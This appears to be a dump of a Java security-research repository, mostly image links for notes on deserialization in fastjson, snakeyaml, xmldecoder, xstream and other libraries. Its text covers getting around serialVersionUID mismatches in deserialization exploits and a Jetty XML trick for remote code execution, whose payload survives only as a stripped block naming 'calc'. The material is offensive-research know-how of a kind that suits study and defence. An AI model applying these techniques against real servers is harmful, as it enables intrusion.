https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110031605273.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110032229069.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110032229069.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110033000831.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110033000831.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110033704985.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110033704985.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110033852412.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110033852412.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110033930830.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110033930830.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110034219641.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110034219641.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110034337153.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110034337153.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110034754508.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110034754508.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110034944896.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110034944896.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110035255396.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110035255396.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110040523386.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110040523386.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110042918567.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110042918567.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110113731767.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110113731767.png
--------------------------------------------------------------------------------
/mechanism/serialization/jackson/note/img/image-20220124163901495.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/jackson/note/img/image-20220124163901495.png
--------------------------------------------------------------------------------
/mechanism/serialization/jackson/note/img/image-20220124164807399.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/jackson/note/img/image-20220124164807399.png
--------------------------------------------------------------------------------
/mechanism/serialization/jackson/note/img/image-20220124165036128.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/jackson/note/img/image-20220124165036128.png
--------------------------------------------------------------------------------
/mechanism/serialization/jackson/note/img/image-20220124171929408.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/jackson/note/img/image-20220124171929408.png
--------------------------------------------------------------------------------
/mechanism/serialization/jackson/note/img/image-20220124173333679.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/jackson/note/img/image-20220124173333679.png
--------------------------------------------------------------------------------
/mechanism/serialization/serialVersionUID.md:
--------------------------------------------------------------------------------
1 |
2 | #### 0x1 引子
3 | SerialVesionUID不一致导致反序列化漏洞利用失败也算是实战中比较常见的问题了,面试也会经常提及。
4 |
5 |
6 | #### 0x2 代码分析
7 | 反序列化的调用栈
8 | ```
9 | initNonProxy:595, ObjectStreamClass (java.io)
10 | readNonProxyDesc:1829, ObjectInputStream (java.io)
11 | readClassDesc:1713, ObjectInputStream (java.io)
12 | readOrdinaryObject:1986, ObjectInputStream (java.io)
13 | readObject0:1535, ObjectInputStream (java.io)
14 | readObject:422, ObjectInputStream (java.io)
15 | main:18, SerializableDemo2 (serialVersionUID)
16 | ```
17 |
18 | - java.io.ObjectStreamClass#initNonProxy
19 |
20 | 
21 |
22 | 对serialVersionUID做了比较,如果发现不相等,则直接抛出异常。
23 |
24 | - java.io.ObjectStreamClass#getSerialVersionUID
25 |
26 | 
27 |
28 | 在没有定义serialVersionUID的时候,会调用computeDefaultSUID 方法,生成一个默认的serialVersionUID。
29 |
30 |
31 |
32 | #### 0x3 解决方案
33 |
34 | - [使用自定义ClassLoader解决反序列化serialVesionUID不一致问题](https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/)
35 |
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220124164807399.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220124164807399.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125143536995.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125143536995.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125143635368.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125143635368.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125143736373.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125143736373.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125144600810.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125144600810.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125144652166.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125144652166.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125145833353.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125145833353.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125154705633.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125154705633.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125155428326.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125155428326.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125155933859.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125155933859.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125161418417.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125161418417.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125161523743.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125161523743.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125162031082.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125162031082.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125162054248.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125162054248.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125162358464.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125162358464.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125170107361.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125170107361.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125170643827.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125170643827.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125171530973.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125171530973.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125172234426.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125172234426.png
--------------------------------------------------------------------------------
/mechanism/serialization/snakeyaml/note/img/image-20220125172659817.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/snakeyaml/note/img/image-20220125172659817.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125184005984.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125184005984.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125184951948.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125184951948.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125185557645.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125185557645.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125191418857.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125191418857.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125191846714.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125191846714.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125192200312.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125192200312.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125192700432.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125192700432.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125192815700.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125192815700.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125193006423.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125193006423.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125193152552.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125193152552.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125194311588.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125194311588.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125195232830.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125195232830.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125195333263.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125195333263.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125195504039.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125195504039.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125195509031.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125195509031.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125195638810.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125195638810.png
--------------------------------------------------------------------------------
/mechanism/serialization/xmldecoder/note/img/image-20220125195726476.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xmldecoder/note/img/image-20220125195726476.png
--------------------------------------------------------------------------------
/mechanism/serialization/xstream/note/img/image-20220124132538895.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xstream/note/img/image-20220124132538895.png
--------------------------------------------------------------------------------
/mechanism/serialization/xstream/note/img/image-20220124142438898.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xstream/note/img/image-20220124142438898.png
--------------------------------------------------------------------------------
/mechanism/serialization/xstream/note/img/image-20220124142533040.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xstream/note/img/image-20220124142533040.png
--------------------------------------------------------------------------------
/mechanism/serialization/xstream/note/img/image-20220124142800151.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xstream/note/img/image-20220124142800151.png
--------------------------------------------------------------------------------
/mechanism/serialization/xstream/note/img/image-20220124143512341.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xstream/note/img/image-20220124143512341.png
--------------------------------------------------------------------------------
/mechanism/serialization/xstream/note/img/image-20220124144454107.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/xstream/note/img/image-20220124144454107.png
--------------------------------------------------------------------------------
/middleware/jboss/note/img/image-20211230142240042.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jboss/note/img/image-20211230142240042.png
--------------------------------------------------------------------------------
/middleware/jboss/note/img/image-20211230142344888.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jboss/note/img/image-20211230142344888.png
--------------------------------------------------------------------------------
/middleware/jboss/note/img/image-20211230142523946.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jboss/note/img/image-20211230142523946.png
--------------------------------------------------------------------------------
/middleware/jboss/note/img/image-20211230142904408.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jboss/note/img/image-20211230142904408.png
--------------------------------------------------------------------------------
/middleware/jetty/note/README.md:
--------------------------------------------------------------------------------
1 | - 1、可解析特殊文件扩展名(同 Resin)
2 |
3 | 
4 |
5 |
6 | 2、[A tip for getting RCE in Jetty apps with just one XML file!](https://twitter.com/ptswarm/status/1555184661751648256)
7 |
8 | ```xml
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 | - calc
17 |
18 |
19 |
20 |
21 |
22 | ```
23 |
24 | 测试效果
25 |
26 | 
27 |
28 |
29 | 3、[Jetty Features for Hacking Web Apps](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/) `研究思路值得学习`
--------------------------------------------------------------------------------
/middleware/jetty/note/img/14dd2f7f0b6541c088e4ad7edfe3addd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/14dd2f7f0b6541c088e4ad7edfe3addd.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/28b9dc3344e840718628bafc5217966b.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/28b9dc3344e840718628bafc5217966b.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/6f51c78bcc1446589bd8e83896d9f0b2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/6f51c78bcc1446589bd8e83896d9f0b2.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211216233502724.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211216233502724.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211216234712662.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211216234712662.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217001324250.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217001324250.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217001503808.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217001503808.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217002035189.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217002035189.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217002249571.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217002249571.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217004418583.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217004418583.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217010553895.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217010553895.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217010831953.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217010831953.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217011014183.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217011014183.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217011112574.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217011112574.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217013218109.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217013218109.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217014201379.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217014201379.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217014312945.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217014312945.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217014404379.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217014404379.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217014610469.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217014610469.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217014753526.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217014753526.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217014939255.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217014939255.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217020041053.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217020041053.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217020157232.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217020157232.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217020358436.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217020358436.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217020502765.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217020502765.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217021404772.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217021404772.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217021835307.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217021835307.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217023418128.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217023418128.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217172652458.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217172652458.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217172728837.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217172728837.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217172917268.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217172917268.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217173209887.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217173209887.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217173619222.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217173619222.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217174108730.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217174108730.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217174219636.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217174219636.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217175432854.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217175432854.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217175856347.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217175856347.png
--------------------------------------------------------------------------------
/middleware/jetty/note/img/image-20211217180215190.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/jetty/note/img/image-20211217180215190.png
--------------------------------------------------------------------------------
